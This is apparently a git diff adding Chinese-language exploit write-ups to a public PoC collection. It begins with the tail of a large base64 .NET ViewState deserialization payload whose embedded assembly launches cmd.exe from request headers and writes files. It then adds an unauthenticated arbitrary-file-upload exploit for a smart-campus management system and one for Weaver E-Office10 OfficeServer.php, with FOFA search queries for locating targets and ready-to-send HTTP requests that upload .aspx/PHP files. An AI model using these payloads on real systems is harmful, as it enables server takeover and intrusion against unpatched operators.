sAAAooEgAACm8TAAAKDQZvBQAACglvHgAACggoHwAACgZvBwAACnJTAABwbxwAAAorVwZvCQAACm8dAAAKcjkAAHBvCwAACigSAAAKDCgRAAAKBm8JAAAKbx0AAApySQAAcG8LAAAKKBIAAApvEwAACg0JCCgfAAAKBm8HAAAKclMAAHBvHAAACt4gEwcGbwcAAApyWQAAcBEHbyAAAAooFAAACm8cAAAK3gAGbwcAAApvIQAACgZvBwAACm8iAAAKKkEcAAAAAAAAIgAAAMMBAADlAQAAIAAAABIAAAFCU0pCAQABAAAAAAAMAAAAdjQuMC4zMDMxOQAAAAAFAGwAAAAMAgAAI34AAHgCAAD8AgAAI1N0cmluZ3MAAAAAdAUAAGQAAAAjVVMA2AUAABAAAAAjR1VJRAAAAOgFAAC4AAAAI0Jsb2IAAAAAAAAAAgAAAUcUAgAJAAAAAPolMwAWAAABAAAAEgAAAAIAAAABAAAAIgAAAAIAAAABAAAAAQAAAAMAAAAAAAoAAQAAAAAABgApACIABgBWADYABgB2ADYACgCoAJ0ACgDAAJ0ACgDoAJ0ACgAIAZ0ADgA%2FASABBgBoASIABgBtASIADgCZAYYBDgChAYYBBgDZAc0BBgDrASIABgB8AnICBgCcAnICBgDIAnICBgDbAiIAAAAAAAEAAAAAAAEAAQAAABAAFwAAAAUAAQABAFAgAAAAAIYYMAAKAAEAEQAwAA4AGQAwAAoACQAwAAoAIQC0ABwAIQDSACEAKQDdAAoAIQD1ACYAMQACAQoAIQAUASsAOQBTATAAQQBfATUAUQB0AToAUQB6AT0AWQAwAAoAWQCyAUMAYQDAAUgAaQDiAU0AcQDzAVIAaQAEAlgAUQAOAl4AYQAVAkgAYQAjAmQAYQA%2BAmQAYQBYAmQAWQBsAmkAWQCJAm0AgQCnAnIAMQCxAkgAOQC3AjAAKQDAAjUAiQDNAnYAkQDlAnIAMQDxAgoAMQD3AgoALgALAI0ALgATAJYAfQAEgAAAAAAAAAAAAAAAAAAAAACUAAAABAAAAAAAAAAAAAAAAQAZAAAAAAAEAAAAAAAAAAAAAAATAJ0AAAAAAAQAAAAAAAAAAAAAAAEAIgAAAAAAAAAAAAA8TW9kdWxlPgA0eW1ndGprZS5kbGwARQBtc2NvcmxpYgBTeXN0ZW0AT2JqZWN0AC5jdG9yAFN5c3RlbS5SdW50aW1lLkNvbXBpbGVyU2VydmljZXMAQ29tcGlsYXRpb25SZWxheGF0aW9uc0F0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQA0eW1ndGprZQBTeXN0ZW0uV2ViAEh0dHBDb250ZXh0AGdldF9DdXJyZW50AEh0dHBTZXJ2ZXJVdGlsaXR5AGdldF9TZXJ2ZXIAQ2xlYXJFcnJvcgBIdHRwUmVzcG9uc2UAZ2V0X1Jlc3BvbnNlAENsZWFyAEh0dHBSZXF1ZXN0AGdldF9SZXF1ZXN0AFN5c3RlbS5Db2xsZWN0aW9ucy5TcGVjaWFsaXplZABOYW1lVmFsdWVDb2xsZWN0aW9uAGdldF9IZWFkZXJzAGdldF9JdGVtAEJ5dGUAU3RyaW5nAEVtcHR5AG9wX0VxdWFsaXR5AFN5c3RlbS5EaWFnbm9zdGljcwBQcm9jZXNzAFByb2Nlc3NTdGFydEluZm8AZ2V0X1N0YXJ0SW5mbwBzZXRfRmlsZU5hbWUAU3lzdGVtLlRleHQARW5jb2RpbmcAZ2V0X1VURjgAQ29udmVydABGcm9tQmFzZTY0U3RyaW5nAEdldFN0cmluZwBDb25jYXQAc2V0X0FyZ3VtZW50cwBzZXRfUmVkaXJlY3RTdGFuZGFyZE91dHB1dABzZXRfUmVkaXJlY3RTdGFuZGFyZEVycm9yAHNldF9Vc2VTaGVsbEV4ZWN1dGUAU3RhcnQAU3lzdGVtLklPAFN0cmVhbVJlYWRlcgBnZXRfU3RhbmRhcmRPdXRwdXQAVGV4dFJlYWRlcgBSZWFkVG9FbmQAV3JpdGUAZ2V0X0Zvcm0ATWFwUGF0aABGaWxlAFdyaXRlQWxsQnl0ZXMARXhjZXB0aW9uAGdldF9NZXNzYWdlAEZsdXNoAEVuZAAAAAlUAFkAUABFAAADQwAAA0YAAAVBAEYAAA9jAG0AZAAuAGUAeABlAAAHUwBJAEQAAAcvAGMAIAAAD2MAbwBuAHQAZQBuAHQAAAlwAGEAdABoAAAFTwBLAAAJRQBSAFIAOgAAAJOiGZzUOwNBl4v0KDM5SBUACLd6XFYZNOCJAyAAAQQgAQEICLA%2FX38R1Qo6BAAAEhEEIAASFQQgABIZBCAAEh0EIAASIQQgAQ4OAgYOBQACAg4OBCAAEjEEIAEBDgQAABI1BQABHQUOBSABDh0FBQACDg4OBCABAQIDIAACBCAAEj0DIAAOBgACAQ4dBQ8HCRIRDh0FDhItDg4SSQ4IAQAIAAAAAAAeAQABAFQCFldyYXBOb25FeGNlcHRpb25UaHJvd3MBAAAAXCkAAAAAAAAAAAAAfikAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHApAAAAAAAAAAAAAAAAAAAAAAAAAABfQ29yRGxsTWFpbgBtc2NvcmVlLmRsbAAAAAAA%2FyUAIAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABABAAAAAYAACAAAAAAAAAAAAAAAAAAAABAAEAAAAwAACAAAAAAAAAAAAAAAAAAAABAAAAAABIAAAAWEAAAEwCAAAAAAAAAAAAAEwCNAAAAFYAUwBfAFYARQBSAFMASQBPAE4AXwBJAE4ARgBPAAAAAAC9BO%2F%2BAAABAAAAAAAAAAAAAAAAAAAAAAA%2FAAAAAAAAAAQAAAACAAAAAAAAAAAAAAAAAAAARAAAAAEAVgBhAHIARgBpAGwAZQBJAG4AZgBvAAAAAAAkAAQAAABUAHIAYQBuAHMAbABhAHQAaQBvAG4AAAAAAAAAsASsAQAAAQBTAHQAcgBpAG4AZwBGAGkAbABlAEkAbgBmAG8AAACIAQAAAQAwADAAMAAwADAANABiADAAAAAsAAIAAQBGAGkAbABlAEQAZQBzAGMAcgBpAHAAdABpAG8AbgAAAAAAIAAAADAACAABAEYAaQBsAGUAVgBlAHIAcwBpAG8AbgAAAAAAMAAuADAALgAwAC4AMAAAADwADQABAEkAbgB0AGUAcgBuAGEAbABOAGEAbQBlAAAANAB5AG0AZwB0AGoAawBlAC4AZABsAGwAAAAAACgAAgABAEwAZQBnAGEAbABDAG8AcAB5AHIAaQBnAGgAdAAAACAAAABEAA0AAQBPAHIAaQBnAGkAbgBhAGwARgBpAGwAZQBuAGEAbQBlAAAANAB5AG0AZwB0AGoAawBlAC4AZABsAGwAAAAAADQACAABAFAAcgBvAGQAdQBjAHQAVgBlAHIAcwBpAG8AbgAAADAALgAwAC4AMAAuADAAAAA4AAgAAQBBAHMAcwBlAG0AYgBsAHkAIABWAGUAcgBzAGkAbwBuAAAAMAAuADAALgAwAC4AMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAMAAAAkDkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABA8AAAAfU3lzdGVtLlVuaXR5U2VyaWFsaXphdGlvbkhvbGRlcgMAAAAERGF0YQlVbml0eVR5cGUMQXNzZW1ibHlOYW1lAQABCAYhAAAA%2FgFTeXN0ZW0uTGlucS5FbnVtZXJhYmxlK1doZXJlU2VsZWN0RW51bWVyYWJsZUl0ZXJhdG9yYDJbW1N5c3RlbS5CeXRlW10sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAGIgAAAE5TeXN0ZW0uQ29yZSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkQEAAAAAcAAAAJAwAAAAoJJAAAAAoICAAAAAAKCAgBAAAAAREAAAAPAAAABiUAAAD1AlN5c3RlbS5MaW5xLkVudW1lcmFibGUrV2hlcmVTZWxlY3RFbnVtZXJhYmxlSXRlcmF0b3JgMltbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHksIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhYmxlYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAACSIAAAAQEgAAAAcAAAAJBAAAAAoJKAAAAAoICAAAAAAKCAgBAAAAARMAAAAPAAAABikAAADfA1N5c3RlbS5MaW5xLkVudW1lcmFibGUrV2hlcmVTZWxlY3RFbnVtZXJhYmxlSXRlcmF0b3JgMltbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmFibGVgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYXRvcmAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAkiAAAAEBQAAAAHAAAACQUAAAAKCSwAAAAKCAgAAAAACggIAQAAAAEVAAAADwAAAAYtAAAA5gJTeXN0ZW0uTGlucS5FbnVtZXJhYmxlK1doZXJlU2VsZWN0RW51bWVyYWJsZUl0ZXJhdG9yYDJbW1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAkiAAAAEBYAAAAHAAAACQYAAAAJMAAAAAkxAAAACggIAAAAAAoICAEAAAABFwAAAA8AAAAGMgAAAO8BU3lzdGVtLkxpbnEuRW51bWVyYWJsZStXaGVyZVNlbGVjdEVudW1lcmFibGVJdGVyYXRvcmAyW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAACSIAAAAQGAAAAAcAAAAJBwAAAAoJNQAAAAoICAAAAAAKCAgBAAAAARkAAAAPAAAABjYAAAApU3lzdGVtLldlYi5VSS5XZWJDb250cm9scy5QYWdlZERhdGFTb3VyY2UEAAAABjcAAABNU3lzdGVtLldlYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWIwM2Y1ZjdmMTFkNTBhM2EQGgAAAAcAAAAJCAAAAAgIAAAAAAgICgAAAAgBAAgBAAgBAAgIAAAAAAEbAAAADwAAAAY5AAAAKVN5c3RlbS5Db21wb25lbnRNb2RlbC5EZXNpZ24uRGVzaWduZXJWZXJiBAAAAAY6AAAASVN5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkQHAAAAAUAAAANAgk7AAAACAgDAAAACQsAAAABHQAAAA8AAAAGPQAAADRTeXN0ZW0uUnVudGltZS5SZW1vdGluZy5DaGFubmVscy5BZ2dyZWdhdGVEaWN0aW9uYXJ5BAAAAAY%2BAAAAS21zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4ORAeAAAAAQAAAAkJAAAAEB8AAAACAAAACQoAAAAJCgAAABAgAAAAAgAAAAZBAAAAAAlBAAAABCQAAAAiU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcgIAAAAIRGVsZWdhdGUHbWV0aG9kMAMDMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeS9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcglCAAAACUMAAAABKAAAACQAAAAJRAAAAAlFAAAAASwAAAAkAAAACUYAAAAJRwAAAAEwAAAAJAAAAAlIAAAACUkAAAABMQAAACQAAAAJSgAAAAlLAAAAATUAAAAkAAAACUwAAAAJTQAAAAE7AAAABAAAAAlOAAAACU8AAAAEQgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRUeXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQZQAAAA1QFTeXN0ZW0uRnVuY2AyW1tTeXN0ZW0uQnl0ZVtdLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JPgAAAAoJPgAAAAZSAAAAGlN5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5BlMAAAAETG9hZAoEQwAAAC9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgcAAAAETmFtZQxBc3NlbWJseU5hbWUJQ2xhc3NOYW1lCVNpZ25hdHVyZQpTaWduYXR1cmUyCk1lbWJlclR5cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEBAAMIDVN5c3RlbS5UeXBlW10JUwAAAAk%2BAAAACVIAAAAGVgAAACdTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseSBMb2FkKEJ5dGVbXSkGVwAAAC5TeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseSBMb2FkKFN5c3RlbS5CeXRlW10pCAAAAAoBRAAAAEIAAAAGWAAAAMwCU3lzdGVtLkZ1bmNgMltbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHksIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhYmxlYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JPgAAAAoJPgAAAAlSAAAABlsAAAAIR2V0VHlwZXMKAUUAAABDAAAACVsAAAAJPgAAAAlSAAAABl4AAAAYU3lzdGVtLlR5cGVbXSBHZXRUeXBlcygpBl8AAAAYU3lzdGVtLlR5cGVbXSBHZXRUeXBlcygpCAAAAAoBRgAAAEIAAAAGYAAAALYDU3lzdGVtLkZ1bmNgMltbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmFibGVgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYXRvcmAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCT4AAAAKCT4AAAAGYgAAAIQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmFibGVgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBmMAAAANR2V0RW51bWVyYXRvcgoBRwAAAEMAAAAJYwAAAAk%2BAAAACWIAAAAGZgAAAEVTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYXRvcmAxW1N5c3RlbS5UeXBlXSBHZXRFbnVtZXJhdG9yKCkGZwAAAJQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmF0b3JgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dIEdldEVudW1lcmF0b3IoKQgAAAAKAUgAAABCAAAABmgAAADAAlN5c3RlbS5GdW5jYDJbW1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkJvb2xlYW4sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCT4AAAAKCT4AAAAGagAAAB5TeXN0ZW0uQ29sbGVjdGlvbnMuSUVudW1lcmF0b3IGawAAAAhNb3ZlTmV4dAoBSQAAAEMAAAAJawAAAAk%2BAAAACWoAAAAGbgAAABJCb29sZWFuIE1vdmVOZXh0KCkGbwAAABlTeXN0ZW0uQm9vbGVhbiBNb3ZlTmV4dCgpCAAAAAoBSgAAAEIAAAAGcAAAAL0CU3lzdGVtLkZ1bmNgMltbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmF0b3JgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JPgAAAAoJPgAAAAZyAAAAhAFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYXRvcmAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0GcwAAAAtnZXRfQ3VycmVudAoBSwAAAEMAAAAJcwAAAAk%2BAAAACXIAAAAGdgAAABlTeXN0ZW0uVHlwZSBnZXRfQ3VycmVudCgpBncAAAAZU3lzdGVtLlR5cGUgZ2V0X0N1cnJlbnQoKQgAAAAKAUwAAABCAAAABngAAADGAVN5c3RlbS5GdW5jYDJbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQk%2BAAAACgk%2BAAAABnoAAAAQU3lzdGVtLkFjdGl2YXRvcgZ7AAAADkNyZWF0ZUluc3RhbmNlCgFNAAAAQwAAAAl7AAAACT4AAAAJegAAAAZ%2BAAAAKVN5c3RlbS5PYmplY3QgQ3JlYXRlSW5zdGFuY2UoU3lzdGVtLlR5cGUpBn8AAAApU3lzdGVtLk9iamVjdCBDcmVhdGVJbnN0YW5jZShTeXN0ZW0uVHlwZSkIAAAACgFOAAAADwAAAAaAAAAAJlN5c3RlbS5Db21wb25lbnRNb2RlbC5EZXNpZ24uQ29tbWFuZElEBAAAAAk6AAAAEE8AAAACAAAACYIAAAAICAAgAAAEggAAAAtTeXN0ZW0uR3VpZAsAAAACX2ECX2ICX2MCX2QCX2UCX2YCX2cCX2gCX2kCX2oCX2sAAAAAAAAAAAAAAAgHBwICAgICAgICExPSdO4q0RGL%2BwCgyQ8m9wsLfW3lPHcqhM8jewcv5VJIqA7wqWA%3D&__VIEWSTATEGENERATOR=60AF4756 +``` + +![image-20240524185349211](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202405241859545.png) + + + diff --git a/智慧校园(安校易)管理系统FileUpProductupdate.aspx任意文件上传漏洞.md b/智慧校园(安校易)管理系统FileUpProductupdate.aspx任意文件上传漏洞.md new file mode 100644 index 0000000..121d6b1 --- /dev/null +++ b/智慧校园(安校易)管理系统FileUpProductupdate.aspx任意文件上传漏洞.md @@ -0,0 +1,42 @@ +## 智慧校园(安校易)管理系统FileUpProductupdate.aspx任意文件上传漏洞 + +智慧校园(安校易)管理系统 FileUpProductupdate.aspx 接口处存在任意文件上传漏洞,未经身份验证的攻击者通过漏洞上传恶意后门文件,执行任意代码,从而获取到服务器权限。 + +## fofa + +``` +title="智慧综合管理平台登入" +``` + + + +## poc + +``` +POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1 +Host: your-ip +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2, +X-Requested-With: XMLHttpRequest +Content-Type: multipart/form-data; boundary=----21909179191068471382830692394 +Connection: close + +------21909179191068471382830692394 +Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx" +Content-Type: image/jpeg + +<%@Page Language="C#"%><%Response.Write("hello");System.IO.File.Delete(Request.PhysicalPath);%> +------21909179191068471382830692394-- +``` + +![image-20240524230505271](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202405242305328.png) + + + +文件路径 + +``` +/Upload/Publish/000000/0_0_0_0/update.aspx +``` + diff --git a/泛微E-Office10-OfficeServer任意文件上传漏洞.md b/泛微E-Office10-OfficeServer任意文件上传漏洞.md new file mode 100644 index 0000000..f61204c --- /dev/null +++ b/泛微E-Office10-OfficeServer任意文件上传漏洞.md @@ -0,0 +1,47 @@ +## 泛微E-Office10-OfficeServer任意文件上传漏洞 + + 泛微OA E-0ffice 10 OfficeServer.php 存在任意文件上传漏洞,攻击者通过漏洞可以获取到服务器敏感信息。 + +## fofa + +``` +app="泛微-EOffice" + +body="eoffice_loading_tip" && body="eoffice10" +``` + + + +## poc + +``` +POST /eoffice10/server/public/iWebOffice2015/OfficeServer.php HTTP/1.1 +Host: xxx.xxx.xxx.xxx +User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 +Content-Length: 395 +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJjb5ZAJOOXO7fwjs +Accept-Encoding: gzip, deflate +Connection: close + +------WebKitFormBoundaryJjb5ZAJOOXO7fwjs +Content-Disposition: form-data; name="FileData"; filename="1.jpg" +Content-Type: image/jpeg + + +------WebKitFormBoundaryJjb5ZAJOOXO7fwjs +Content-Disposition: form-data; name="FormData" + 